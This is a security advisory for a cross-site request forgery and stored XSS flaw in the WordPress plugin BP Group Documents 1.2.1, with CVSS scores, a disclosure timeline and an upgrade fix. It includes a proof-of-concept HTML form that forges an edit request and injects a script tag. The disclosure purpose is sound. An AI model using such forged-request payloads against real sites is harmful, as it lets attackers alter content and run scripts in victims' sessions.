CSRF vulnerability in BP Group Documents 1.2.1

Vulnerability

Last revised: February 18, 2014

An unauthenticated user can cause a logged in user to edit the name and description of any existing group document. The fields are also vulnerable to XSS.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5 Medium
Vector	Network
Complexity	Low
Authentication	None
Confidentiality	None
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Assume we have a group with slug “x” and a group document with id 8:

<form method="POST" action="https://wp.ayumu/groups/x/documents/">
  <input type="text" name="bp_group_documents_operation" value="edit">
  <input type="text" name="bp_group_documents_id" value="8">
  <input type="text" name="bp_group_documents_name" value="&lt;script>alert(1)&lt;/script>">
  <input type="text" name="bp_group_documents_description" value="abc">
  <input type="submit">
</form>

Advisory timeline

2013-09-26: Discovered
2013-09-30: Reported to plugins@wordpress.org
2013-10-04: Fix released (1.2.2)

Mitigation/further actions

Update to version 1.2.2.

dxw advisories

Advisory: